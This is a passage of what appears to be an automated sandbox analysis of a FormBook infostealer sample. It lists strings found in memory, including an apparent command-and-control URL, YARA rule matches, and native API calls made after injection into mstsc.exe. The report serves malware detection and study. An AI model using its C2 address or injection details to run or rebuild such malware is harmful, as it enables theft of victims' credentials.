Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com2
Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comW.TTF
Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.coma
Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comalic
Source: JFBlvEr5H9.exe, 00000000.00000003.245948379.000000000591E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comals
Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comd
Source: JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comda
Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comion
Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comm
Source: JFBlvEr5H9.exe, 00000000.00000003.246881915.000000000591C000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comn
Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comsivd
Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comue
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000003.239881394.0000000005917000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: JFBlvEr5H9.exe, 00000000.00000003.239956234.0000000005918000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn3
Source: JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnX
Source: JFBlvEr5H9.exe, 00000000.00000003.239956234.0000000005918000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnicr
Source: JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnl-nX
Source: JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cns-m
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/)
Source: JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/4
Source: JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/B
Source: JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/s/0
Source: JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/w
Source: mstsc.exe, 00000015.00000002.500275639.0000000000957000.00000004.00000020.sdmp	String found in binary or memory: http://www.pyithuhluttaw.net/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=NEaCbUvtdfVyj3ONmrIJ7dR/yfSp7Xbba33MRCbi01
Source: JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com2
Source: JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.come
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_004181B0 NtCreateFile,	4_2_004181B0
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00418260 NtReadFile,	4_2_00418260
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_004182E0 NtClose,	4_2_004182E0
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00418390 NtAllocateVirtualMemory,	4_2_00418390
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_004182AC NtReadFile,	4_2_004182AC
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041838B NtAllocateVirtualMemory,	4_2_0041838B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9860 NtQuerySystemInformation,LdrInitializeThunk,	21_2_04AF9860
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9840 NtDelayExecution,LdrInitializeThunk,	21_2_04AF9840
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF99A0 NtCreateSection,LdrInitializeThunk,	21_2_04AF99A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF95D0 NtClose,LdrInitializeThunk,	21_2_04AF95D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	21_2_04AF9910
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9540 NtReadFile,LdrInitializeThunk,	21_2_04AF9540
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,	21_2_04AF96E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF96D0 NtCreateKey,LdrInitializeThunk,	21_2_04AF96D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,	21_2_04AF9660
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9A50 NtCreateFile,LdrInitializeThunk,	21_2_04AF9A50
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9650 NtQueryValueKey,LdrInitializeThunk,	21_2_04AF9650
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9780 NtMapViewOfSection,LdrInitializeThunk,	21_2_04AF9780
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9FE0 NtCreateMutant,LdrInitializeThunk,	21_2_04AF9FE0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9710 NtQueryInformationToken,LdrInitializeThunk,	21_2_04AF9710
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF98A0 NtWriteVirtualMemory,	21_2_04AF98A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF98F0 NtReadVirtualMemory,	21_2_04AF98F0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9820 NtEnumerateKey,	21_2_04AF9820
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AFB040 NtSuspendThread,	21_2_04AFB040
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF95F0 NtQueryInformationFile,	21_2_04AF95F0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF99D0 NtCreateProcessEx,	21_2_04AF99D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9520 NtWaitForSingleObject,	21_2_04AF9520
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AFAD30 NtSetContextThread,	21_2_04AFAD30
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9560 NtWriteFile,	21_2_04AF9560
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9950 NtQueueApcThread,	21_2_04AF9950
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9A80 NtOpenDirectoryObject,	21_2_04AF9A80
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9A20 NtResumeThread,	21_2_04AF9A20
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9A00 NtProtectVirtualMemory,	21_2_04AF9A00
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9A10 NtQuerySection,	21_2_04AF9A10
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9610 NtEnumerateValueKey,	21_2_04AF9610
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9670 NtQueryInformationProcess,	21_2_04AF9670
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF97A0 NtUnmapViewOfSection,	21_2_04AF97A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AFA3B0 NtGetContextThread,	21_2_04AFA3B0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9730 NtQueryVirtualMemory,	21_2_04AF9730
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9B00 NtSetValueKey,	21_2_04AF9B00
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AFA710 NtOpenProcessToken,	21_2_04AFA710
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9760 NtOpenProcess,	21_2_04AF9760
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF9770 NtSetInformationFile,	21_2_04AF9770
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AFA770 NtOpenThread,	21_2_04AFA770
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_007081B0 NtCreateFile,	21_2_007081B0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_00708260 NtReadFile,	21_2_00708260
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_007082E0 NtClose,	21_2_007082E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_00708390 NtAllocateVirtualMemory,	21_2_00708390
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_007082AC NtReadFile,	21_2_007082AC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_0070838B NtAllocateVirtualMemory,	21_2_0070838B

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_0054B673	0_2_0054B673
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_01080418	0_2_01080418
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_01082630	0_2_01082630
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_01080408	0_2_01080408
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_01080013	0_2_01080013
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_01080040	0_2_01080040
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_010EC27C	0_2_010EC27C
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_010EEC48	0_2_010EEC48
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_010EEC58	0_2_010EEC58
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_0054B6C0	0_2_0054B6C0
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00401030	4_2_00401030
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041B8B1	4_2_0041B8B1
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041B963	4_2_0041B963
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00408C4B	4_2_00408C4B
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00408C50	4_2_00408C50
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041B493	4_2_0041B493
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041B496	4_2_0041B496
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041C539	4_2_0041C539
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00402D89	4_2_00402D89
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041CE85	4_2_0041CE85
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041BF12	4_2_0041BF12
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041C795	4_2_0041C795
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00A7B673	4_2_00A7B673
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00A7B6C0	4_2_00A7B6C0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE20A0	21_2_04AE20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B820A8	21_2_04B820A8
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ACB090	21_2_04ACB090
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC841F	21_2_04AC841F
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B71002	21_2_04B71002
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE2581	21_2_04AE2581
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ACD5E0	21_2_04ACD5E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB0D20	21_2_04AB0D20
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AD4120	21_2_04AD4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABF900	21_2_04ABF900
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B82D07	21_2_04B82D07
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B81D55	21_2_04B81D55
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B822AE	21_2_04B822AE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B82EF7	21_2_04B82EF7
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AD6E30	21_2_04AD6E30
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEEBB0	21_2_04AEEBB0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B81FF1	21_2_04B81FF1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B82B28	21_2_04B82B28
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_0070B8B1	21_2_0070B8B1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_0070B954	21_2_0070B954
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_006F8C4B	21_2_006F8C4B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_006F8C50	21_2_006F8C50
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_0070B493	21_2_0070B493
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_0070B496	21_2_0070B496
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_0070C539	21_2_0070C539
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_006F2D89	21_2_006F2D89
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_006F2D90	21_2_006F2D90
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_0070CE85	21_2_0070CE85
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_0070BF12	21_2_0070BF12
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_006F2FB0	21_2_006F2FB0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_0070C795	21_2_0070C795

Source: C:\Windows\SysWOW64\mstsc.exe

Code function: String function: 04ABB150 appears 35 times

Source: JFBlvEr5H9.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: JFBlvEr5H9.exe, 00000000.00000002.259012000.0000000002AC1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameConfigNodeType.dll> vs JFBlvEr5H9.exe
Source: JFBlvEr5H9.exe, 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameStoreElement.dllB vs JFBlvEr5H9.exe
Source: JFBlvEr5H9.exe, 00000000.00000002.257828156.000000000064A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameTOKENSTATISTI.exe2 vs JFBlvEr5H9.exe
Source: JFBlvEr5H9.exe, 00000000.00000002.275089237.0000000006FF0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs JFBlvEr5H9.exe
Source: JFBlvEr5H9.exe, 00000004.00000000.256995077.0000000000B7A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameTOKENSTATISTI.exe2 vs JFBlvEr5H9.exe
Source: JFBlvEr5H9.exe, 00000004.00000002.357592649.0000000003783000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamemstsc.exej% vs JFBlvEr5H9.exe
Source: JFBlvEr5H9.exe, 00000004.00000002.356712545.00000000018CF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs JFBlvEr5H9.exe
Source: JFBlvEr5H9.exe	Binary or memory string: OriginalFilenameTOKENSTATISTI.exe2 vs JFBlvEr5H9.exe

Source: JFBlvEr5H9.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
